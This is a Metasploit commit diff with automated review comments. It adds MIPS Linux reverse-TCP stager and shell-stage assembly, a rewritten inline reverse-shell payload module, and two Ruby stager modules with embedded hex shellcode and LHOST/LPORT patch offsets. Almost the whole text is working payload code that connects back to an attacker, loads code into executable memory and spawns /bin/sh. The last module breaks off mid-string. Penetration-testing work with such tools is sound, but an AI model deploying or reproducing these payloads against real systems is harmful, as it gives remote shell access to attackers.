Merge branch 'upstream/master' into basic_adsi_support
commit
f3a13d89af
|
@ -0,0 +1,75 @@
|
|||
##
|
||||
#
|
||||
# Name: stage_tcp_shell
|
||||
# Type: Stage
|
||||
# Qualities: Compatible with both mips little and big endian
|
||||
# Platforms: Linux
|
||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
||||
# License:
|
||||
#
|
||||
# This file is part of the Metasploit Exploit Framework
|
||||
# and is subject to the same licenses and copyrights as
|
||||
# the rest of this package.
|
||||
#
|
||||
# Description:
|
||||
#
|
||||
# This payload duplicates stdio, stdin and stderr to a file descriptor,
|
||||
# stored on $s2, and executes /bin/sh.
|
||||
#
|
||||
# Assemble and create a relocatable object with:
|
||||
# as -o stage_tcp_shell.o stage_tcp_shell.s
|
||||
#
|
||||
# Assemble, link and create an executable ELF with:
|
||||
# gcc -o stage_tcp_shell stage_tcp_shell.s
|
||||
#
|
||||
# The tool "tools/metasm_shell.rb" can be used to easily
|
||||
# generate the string to place on:
|
||||
# modules/payloads/stages/linux/mipsle/shell.rb
|
||||
# and:
|
||||
# modules/payloads/stages/linux/mipsbe/shell.rb
|
||||
##
|
||||
.text
|
||||
.align 2
|
||||
.globl main
|
||||
.set nomips16
|
||||
main:
|
||||
.set noreorder
|
||||
.set nomacro
|
||||
|
||||
# dup2(sockfd, 2)
|
||||
# dup2(sockfd, 1)
|
||||
# dup2(sockfd, 0)
|
||||
# a0: oldfd (sockfd)
|
||||
# a1: newfd (2, 1, 0)
|
||||
# v0: syscall = __NR_dup2 (4063)
|
||||
li $s1, -3
|
||||
nor $s1, $s1, $zero
|
||||
add $a0, $s2, $zero
|
||||
dup2_loop:
|
||||
add $a1, $s1, $zero # dup2_loop
|
||||
li $v0, 4063 # sys_dup2
|
||||
syscall 0x40404
|
||||
li $s0, -1
|
||||
addi $s1, $s1, -1
|
||||
bne $s1, $s0, dup2_loop # <dup2_loop>
|
||||
|
||||
# execve("/bin/sh", ["/bin/sh"], NULL)
|
||||
# a0: filename "/bin/sh"
|
||||
# a1: argv ["/bin/sh", NULL]
|
||||
# a2: envp NULL
|
||||
# v0: syscall = __NR_dup2 (4011)
|
||||
li $t8, -1 # load t8 with -1
|
||||
getaddr: # getaddr trick from scut@team-teso.net
|
||||
bltzal $t8, getaddr # branch with $ra stored if t8 < 0
|
||||
slti $t8, $zero, -1 # delay slot instr: $t8 = 0 (see below)
|
||||
addi $a0, $ra, 28 # $ra gets this address
|
||||
sw $a0, -8($sp)
|
||||
sw $zero, -4($sp)
|
||||
addi $a1, $sp, -8
|
||||
slti $a2, $zero,-1
|
||||
li $v0, 4011 # sys_execve
|
||||
syscall 0x40404
|
||||
|
||||
.string "/bin/sh"
|
||||
.set macro
|
||||
.set reorder
|
|
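Review bot: The comment `# v0: syscall = __NR_dup2 (4011)` in the execve block labels the execve number with the dup2 name; the `li $v0, 4011 # sys_execve` that follows is right, so the comment should read `# v0: syscall = __NR_execve (4011)`. The description line "duplicates stdio, stdin and stderr to a file descriptor" should say stdout, since the dup2_loop copies the descriptor in $s2 onto 2, 1 and 0. The `.string "/bin/sh"` after the execve syscall embeds a NUL terminator, so this stage is not null-free; the header only claims endianness compatibility, but stating that under `# Qualities:` would keep it consistent with the stager headers, which do make a no-nulls claim.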
@ -0,0 +1,127 @@
|
|||
##
|
||||
#
|
||||
# Name: stager_sock_reverse
|
||||
# Type: Stager
|
||||
# Qualities: No Nulls out of the IP / Port data
|
||||
# Platforms: Linux MIPS Big Endian
|
||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
||||
# License:
|
||||
#
|
||||
# This file is part of the Metasploit Exploit Framework
|
||||
# and is subject to the same licenses and copyrights as
|
||||
# the rest of this package.
|
||||
#
|
||||
# Description:
|
||||
#
|
||||
# Implementation of a MIPS BE Linux reverse TCP stager.
|
||||
#
|
||||
# File descriptor in $s2.
|
||||
#
|
||||
# Assemble and create a relocatable object with:
|
||||
# as -o stager_sock_reverse.o stager_sock_reverse.s
|
||||
#
|
||||
# Assemble, link and create an executable ELF with:
|
||||
# gcc -o stager_sock_reverse stager_sock_reverse.s
|
||||
#
|
||||
# The tool "tools/metasm_shell.rb" can be used to easily
|
||||
# generate the string to place on:
|
||||
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
|
||||
##
|
||||
.text
|
||||
.align 2
|
||||
.globl main
|
||||
.set nomips16
|
||||
main:
|
||||
.set noreorder
|
||||
.set nomacro
|
||||
|
||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||
# a0: domain = PF_INET (2)
|
||||
# a1: type = SOCK_STREAM (2)
|
||||
# a2: protocol = IPPROTO_IP (0)
|
||||
# v0: syscall = __NR_socket (4183)
|
||||
li $t7, -6
|
||||
nor $t7, $t7, $zero
|
||||
addi $a0, $t7, -3
|
||||
addi $a1, $t7, -3
|
||||
slti $a2, $zero, -1
|
||||
li $v0, 4183
|
||||
syscall 0x40404
|
||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||
|
||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||
# a0: sockfd
|
||||
# a1: addr = AF_INET (2)
|
||||
# a2: addrlen = 16
|
||||
# v0: syscall = __NR_connect (4170)
|
||||
lw $a0, -4($sp)
|
||||
li $t7, -3
|
||||
nor $t7, $t7, $zero
|
||||
sw $t7, -32($sp)
|
||||
lui $t6, 0x115c
|
||||
sw $t6, -28($sp)
|
||||
lui $t6, 0x7f00 # ip
|
||||
ori $t6, $t6, 0x0001 # ip
|
||||
sw $t6, -26($sp)
|
||||
addiu $a1, $sp, -30
|
||||
li $t4, -17
|
||||
nor $a2, $t4, $zero
|
||||
li $v0, 4170
|
||||
syscall 0x40404
|
||||
|
||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||
# a0: addr = -1
|
||||
# a1: lenght = 4096
|
||||
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
||||
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
||||
# sp(16): fd = -1
|
||||
# sp(20): offset = 0
|
||||
# v0: syscall = __NR_mmap (4090)
|
||||
li $a0, -1
|
||||
li $a1, 4097
|
||||
addi $a1, $a1, -1
|
||||
li $t1, -8
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $a3, 2050
|
||||
li $t3, -22
|
||||
nor $t3, $t3, $zero
|
||||
add $t3, $sp, $t3
|
||||
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||
li $v0, 4090
|
||||
syscall 0x40404
|
||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||
|
||||
# read(sockfd, addr, 4096)
|
||||
# a0: sockfd
|
||||
# a1: addr
|
||||
# a2: len = 4096
|
||||
# v0: syscall = __NR_read (4003)
|
||||
lw $a0, -4($sp)
|
||||
lw $a1, -8($sp)
|
||||
li $a2, 4097
|
||||
addi $a2, $a2, -1
|
||||
li $v0, 4003
|
||||
syscall 0x40404
|
||||
|
||||
# cacheflush(addr, nbytes, DCACHE)
|
||||
# a0: addr
|
||||
# a1: nbytes
|
||||
# a2: cache = DCACHE (2)
|
||||
# v0: syscall = __NR_read (4147)
|
||||
lw $a0, -8($sp)
|
||||
add $a1, $v0, $zero
|
||||
li $t1, -3
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $v0, 4147
|
||||
syscall 0x40404
|
||||
|
||||
# jmp to the stage
|
||||
lw $s1, -8($sp)
|
||||
lw $s2, -4($sp)
|
||||
jalr $s1
|
||||
|
||||
.set macro
|
||||
.set reorder
|
|
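Review bot: `sw $2, -5($t3)` stores $v0, which at that point holds connect's return value (0 on success), into the mmap fd slot that the comment `# sp(16): fd = -1` promises is -1; Linux ignores fd for MAP_ANONYMOUS so it works, but either the comment should say what is really stored or the store should use `$a0`, which still holds the -1 loaded by `li $a0, -1` (changing the instruction also changes the bytes embedded in the stager module). The cacheflush block's `# v0: syscall = __NR_read (4147)` should read `# v0: syscall = __NR_cacheflush (4147)`, the connect comment names `inet_addr("192.168.172.1")` while `lui $t6, 0x7f00` / `ori $t6, $t6, 0x0001` encode 127.0.0.1 (say these are placeholders patched through the module's 'Offsets'), and `# a1: addr = AF_INET (2)` describes the sin_family word written at -32($sp) whereas a1 itself is the sockaddr pointer set by `addiu $a1, $sp, -30`. `sw $t6, -26($sp)` is a word store to an address that is not 4-byte aligned when $sp is, so on MIPS it depends on the kernel's unaligned-access emulation, which deserves a comment. The same points apply to the little-endian stager in the next file section (there the unaligned stores are `sw $t7, -30($sp)` and `sw $t6, -26($sp)`), and `lenght` in the mmap comment is a typo in both.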
@ -0,0 +1,127 @@
|
|||
##
|
||||
#
|
||||
# Name: stager_sock_reverse
|
||||
# Type: Stager
|
||||
# Qualities: No Nulls out of the IP / Port data
|
||||
# Platforms: Linux MIPS Little Endian
|
||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
||||
# License:
|
||||
#
|
||||
# This file is part of the Metasploit Exploit Framework
|
||||
# and is subject to the same licenses and copyrights as
|
||||
# the rest of this package.
|
||||
#
|
||||
# Description:
|
||||
#
|
||||
# Implementation of a MIPS LE Linux reverse TCP stager.
|
||||
#
|
||||
# File descriptor in $s2.
|
||||
#
|
||||
# Assemble and create a relocatable object with:
|
||||
# as -o stager_sock_reverse.o stager_sock_reverse.s
|
||||
#
|
||||
# Assemble, link and create an executable ELF with:
|
||||
# gcc -o stager_sock_reverse stager_sock_reverse.s
|
||||
#
|
||||
# The tool "tools/metasm_shell.rb" can be used to easily
|
||||
# generate the string to place on:
|
||||
# modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
|
||||
##
|
||||
.text
|
||||
.align 2
|
||||
.globl main
|
||||
.set nomips16
|
||||
main:
|
||||
.set noreorder
|
||||
.set nomacro
|
||||
|
||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||
# a0: domain = PF_INET (2)
|
||||
# a1: type = SOCK_STREAM (2)
|
||||
# a2: protocol = IPPROTO_IP (0)
|
||||
# v0: syscall = __NR_socket (4183)
|
||||
li $t7, -6
|
||||
nor $t7, $t7, $zero
|
||||
addi $a0, $t7, -3
|
||||
addi $a1, $t7, -3
|
||||
slti $a2, $zero, -1
|
||||
li $v0, 4183
|
||||
syscall 0x40404
|
||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||
|
||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||
# a0: sockfd
|
||||
# a1: addr = AF_INET (2)
|
||||
# a2: addrlen = 16
|
||||
# v0: syscall = __NR_connect (4170)
|
||||
lw $a0, -4($sp)
|
||||
li $t7, -3
|
||||
nor $t7, $t7, $zero
|
||||
sw $t7, -30($sp)
|
||||
ori $t6, $zero, 0x5c11 # port
|
||||
sw $t6, -28($sp)
|
||||
lui $t6, 0x100 # ip
|
||||
ori $t6, $t6, 0x7f # ip
|
||||
sw $t6, -26($sp)
|
||||
addiu $a1, $sp, -30
|
||||
li $t4, -17
|
||||
nor $a2, $t4, $zero
|
||||
li $v0, 4170
|
||||
syscall 0x40404
|
||||
|
||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||
# a0: addr = -1
|
||||
# a1: lenght = 4096
|
||||
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
||||
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
||||
# sp(16): fd = -1
|
||||
# sp(20): offset = 0
|
||||
# v0: syscall = __NR_mmap (4090)
|
||||
li $a0, -1
|
||||
li $a1, 4097
|
||||
addi $a1, $a1, -1
|
||||
li $t1, -8
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $a3, 2050
|
||||
li $t3, -22
|
||||
nor $t3, $t3, $zero
|
||||
add $t3, $sp, $t3
|
||||
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||
li $v0, 4090
|
||||
syscall 0x40404
|
||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||
|
||||
# read(sockfd, addr, 4096)
|
||||
# a0: sockfd
|
||||
# a1: addr
|
||||
# a2: len = 4096
|
||||
# v0: syscall = __NR_read (4003)
|
||||
lw $a0, -4($sp)
|
||||
lw $a1, -8($sp)
|
||||
li $a2, 4097
|
||||
addi $a2, $a2, -1
|
||||
li $v0, 4003
|
||||
syscall 0x40404
|
||||
|
||||
# cacheflush(addr, nbytes, DCACHE)
|
||||
# a0: addr
|
||||
# a1: nbytes
|
||||
# a2: cache = DCACHE (2)
|
||||
# v0: syscall = __NR_read (4147)
|
||||
lw $a0, -8($sp)
|
||||
add $a1, $v0, $zero
|
||||
li $t1, -3
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $v0, 4147
|
||||
syscall 0x40404
|
||||
|
||||
# jmp to the stage
|
||||
lw $s1, -8($sp)
|
||||
lw $s2, -4($sp) # sockfd saved on $s2
|
||||
jalr $s1
|
||||
|
||||
.set macro
|
||||
.set reorder
|
|
@ -3,9 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org)
|
||||
# + Few removals of unneccessary zero bytes by kost
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
|
@ -21,7 +18,11 @@ module Metasploit3
|
|||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Reverse TCP Inline',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => 'Julien Tinnes',
|
||||
'Author' =>
|
||||
[
|
||||
'rigan <imrigan[at]gmail.com>', # Original (mipsbe) shellcode
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
|
@ -47,74 +48,72 @@ module Metasploit3
|
|||
port = [port].pack("n").unpack("cc")
|
||||
|
||||
shellcode =
|
||||
"\xef\xff\x09\x24" + # li t1,-17
|
||||
"\xff\xff\x10\x05" + # bltzal t0,0x4
|
||||
"\x82\x82\x08\x28" + # slti t0,zero,-32126
|
||||
"\x27\x48\x20\x01" + # nor t1,t1,zero
|
||||
"\x21\xc8\x3f\x01" + # addu t9,t1,ra
|
||||
"\x48\x85\xb9\xaf" + # sw t9,-31416(sp)
|
||||
"\x48\x85\xb9\x23" + # addi t9,sp,-31416
|
||||
"\x00\x00\x1c\x3c" + # lui gp,0x0
|
||||
"\x00\x00\x9c\x27" + # addiu gp,gp,0
|
||||
"\x21\xe0\x99\x03" + # addu gp,gp,t9
|
||||
"\x00\x00\x89\x8f" + # lw t1,0(gp)
|
||||
"\xd8\xff\xbd\x27" + # addiu sp,sp,-40
|
||||
"\xe8\x00\x2a\x25" + # addiu t2,t1,232
|
||||
"\x04\x00\x47\x8d" + # lw a3,4(t2)
|
||||
"\xe8\x00\x28\x8d" + # lw t0,232(t1)
|
||||
host[2..3].pack("C2") + "\x04\x3c" + # lui a0,0x901
|
||||
host[0..1].pack("C2") + "\x83\x34" + # ori v1,a0,0xa8c0
|
||||
"\x18\x00\xb9\x27" + # addiu t9,sp,24
|
||||
"\x02\x00\x06\x24" + # li a2,2
|
||||
port.pack("C2") + "\x05\x24" + # li a1,9746
|
||||
"\x08\x00\xa6\xa7" + # sh a2,8(sp)
|
||||
"\x0a\x00\xa5\xa7" + # sh a1,10(sp)
|
||||
"\x18\x00\xa8\xaf" + # sw t0,24(sp)
|
||||
"\x1c\x00\xa7\xaf" + # sw a3,28(sp)
|
||||
"\x0c\x00\xa3\xaf" + # sw v1,12(sp)
|
||||
"\x20\x00\xb9\xaf" + # sw t9,32(sp)
|
||||
"\x24\x00\xa0\xaf" + # sw zero,36(sp)
|
||||
"\x02\x00\x04\x24" + # li a0,2
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x57\x10\x02\x24" + # li v0,4183
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x21\x18\x40\x00" + # move v1,v0
|
||||
"\xff\xff\x02\x24" + # li v0,-1
|
||||
"\x1a\x00\x62\x10" + # beq v1,v0,0xf4
|
||||
"\x01\x00\x04\x24" + # li a0,1
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x08\x00\xa5\x27" + # addiu a1,sp,8
|
||||
"\x10\x00\x06\x24" + # li a2,16
|
||||
"\x4a\x10\x02\x24" + # li v0,4170
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x0e\x00\x40\x14" + # bnez v0,0xe0
|
||||
"\x21\x28\x00\x00" + # move a1,zero
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x01\x00\x05\x24" + # li a1,1
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x21\x20\x20\x03" + # move a0,t9
|
||||
"\x20\x00\xa5\x27" + # addiu a1,sp,32
|
||||
"\xab\x0f\x02\x24" + # li v0,4011
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x21\x20\x00\x00" + # move a0,zero
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x08\x00\xe0\x03" + # jr ra
|
||||
"\x28\x00\xbd\x27" + # addiu sp,sp,40
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\xe5\xff\x00\x10" + # b 0x94
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x2f\x62\x69\x6e" + # "/bin"
|
||||
"\x2f\x73\x68\x00" + # "/sh\x00"
|
||||
"0"*80
|
||||
# sys_socket
|
||||
# a0: domain
|
||||
# a1: type
|
||||
# a2: protocol
|
||||
"\xfa\xff\x0f\x24" + # li t7,-6
|
||||
"\x27\x78\xe0\x01" + # nor t7,t7,zero
|
||||
"\xfd\xff\xe4\x21" + # addi a0,t7,-3
|
||||
"\xfd\xff\xe5\x21" + # addi a1,t7,-3
|
||||
"\xff\xff\x06\x28" + # slti a2,zero,-1
|
||||
"\x57\x10\x02\x24" + # li v0,4183 # sys_socket
|
||||
"\x0c\x01\x01\x01" + # syscall 0x40404
|
||||
|
||||
# sys_connect
|
||||
# a0: sockfd (stored on the stack)
|
||||
# a1: addr (data stored on the stack)
|
||||
# a2: addrlen
|
||||
"\xff\xff\xa2\xaf" + # sw v0,-1(sp)
|
||||
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
|
||||
"\xfd\xff\x0f\x34" + # li t7,0xfffd
|
||||
"\x27\x78\xe0\x01" + # nor t7,t7,zero
|
||||
"\xe2\xff\xaf\xaf" + # sw t7,-30(sp)
|
||||
port.pack("C2") + "\x0e\x3c" + # lui t6,0x1f90
|
||||
port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
|
||||
"\xe4\xff\xae\xaf" + # sw t6,-28(sp)
|
||||
host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
|
||||
host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
|
||||
"\xe6\xff\xae\xaf" + # sw t6,-26(sp)
|
||||
"\xe2\xff\xa5\x27" + # addiu a1,sp,-30
|
||||
"\xef\xff\x0c\x24" + # li t4,-17
|
||||
"\x27\x30\x80\x01" + # nor a2,t4,zero
|
||||
"\x4a\x10\x02\x24" + # li v0,4170 # sys_connect
|
||||
"\x0c\x01\x01\x01" + # syscall 0x40404
|
||||
|
||||
# sys_dup2
|
||||
# a0: oldfd (socket)
|
||||
# a1: newfd (0, 1, 2)
|
||||
"\xfd\xff\x11\x24" + # li s1,-3
|
||||
"\x27\x88\x20\x02" + # nor s1,s1,zero
|
||||
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
|
||||
"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup2
|
||||
"\x0c\x01\x01\x01" + # syscall 0x40404
|
||||
"\xff\xff\x10\x24" + # li s0,-1
|
||||
"\xff\xff\x31\x22" + # addi s1,s1,-1
|
||||
"\xfa\xff\x30\x16" + # bne s1,s0,68 <dup2_loop>
|
||||
|
||||
# sys_execve
|
||||
# a0: filename (stored on the stack) "//bin/sh"
|
||||
# a1: argv "//bin/sh"
|
||||
# a2: envp (null)
|
||||
"\xff\xff\x06\x28" + # slti a2,zero,-1
|
||||
"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
|
||||
"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
|
||||
"\xec\xff\xaf\xaf" + # sw t7,-20(sp)
|
||||
"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
|
||||
"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
|
||||
"\xf0\xff\xae\xaf" + # sw t6,-16(sp)
|
||||
"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
|
||||
"\xec\xff\xa4\x27" + # addiu a0,sp,-20
|
||||
"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
|
||||
"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
|
||||
"\xf8\xff\xa5\x27" + # addiu a1,sp,-8
|
||||
"\xab\x0f\x02\x24" + # li v0,4011 # sys_execve
|
||||
"\x0c\x01\x01\x01" # syscall 0x40404
|
||||
|
||||
return super + shellcode
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
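Review bot: The comment `# li t7,0xfffd` on `"\xfd\xff\x0f\x34"` is misleading: that word is `ori t7,zero,0xfffd`, which zero-extends, so the following `nor t7,t7,zero` yields 0xffff0002 rather than the 2 that the assembly source's `li $t7, -3` (addiu, the `\xfd\xff\x0f\x24` encoding used for `li s1,-3` below) produces, and `sw t7,-30(sp)` then puts 0xffff into the sin_port bytes, which is only correct because `sw t6,-28(sp)` overwrites them afterwards. Either encode it as `"\xfd\xff\x0f\x24" + # addiu t7,zero,-3` or make the comment say `# ori t7,zero,0xfffd (nor gives 0xffff0002; upper half overwritten by the port store)`. `sw v0,-1(sp)` and the two `lw a0,-1(sp)`, like the `-30(sp)` and `-26(sp)` stores, are word accesses at non-4-byte-aligned addresses when sp is aligned, so the payload depends on the kernel's unaligned-access emulation; a short stack-layout comment (sockaddr at -30, "//bin/sh" at -20, argv at -8, sockfd straddling -1) would also make explicit that the later `sw zero,-4(sp)` clobbers the sockfd's low byte, which is harmless only because the last `lw a0,-1(sp)` has already run. The enclosing method starts above the hunk (its `def` is not shown; presumably the module's generate), and `return super + shellcode` at its end is the only place the new bytes are used.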
@ -0,0 +1,56 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Linux
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ [58, 62], 'ADDR16MSB' ],
|
||||
'LPORT' => [ 50, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
|
||||
"\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
|
||||
"\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
|
||||
"\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
|
||||
"\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
|
||||
"\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
|
||||
"\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
|
||||
"\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
|
||||
"\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
|
||||
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
|
||||
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
|
||||
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
|
||||
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
|
||||
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
|
||||
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
|
||||
"\xf8\x09"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
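Review bot: The 'Offsets' entries match the bytes — `lui $t6, 0x115c` occupies bytes 48-51 so the port immediate is at 50, and the `lui`/`ori` pair for the address carries the upper half at 58 and the lower at 62 — but nothing says so, and a reader cannot verify them without disassembling the string; a comment such as `# LPORT patches the lui immediate (bytes 50-51); LHOST patches the lui/ori immediates (58-59 upper half, 62-63 lower half); 127.0.0.1:4444 are placeholders` would make the contract checkable. The little-endian stager in the next file section needs the same note, where the order is reversed (`'LHOST' => [ [60, 56], 'ADDR16MSB' ]`): if ADDR16MSB writes the high 16 bits of the address at the first offset, those land in the `ori` at 60 and the low 16 bits in the `lui` at 56, because the immediates and the final `sw` are both little-endian. Naming the assembly source these bytes were generated from (the stager_sock_reverse.s files earlier in this commit) would also help keep the two in sync.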
@ -0,0 +1,56 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Linux
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ [60, 56], 'ADDR16MSB' ],
|
||||
'LPORT' => [ 48, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
|
||||
"\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
|
||||
"\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
|
||||
"\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
|
||||
"\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
|
||||
"\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
|
||||
"\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
|
||||
"\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
|
||||
"\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
|
||||
"\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
|
||||
"\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
|
||||
"\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
|
||||
"\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
|
||||
"\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
|
||||
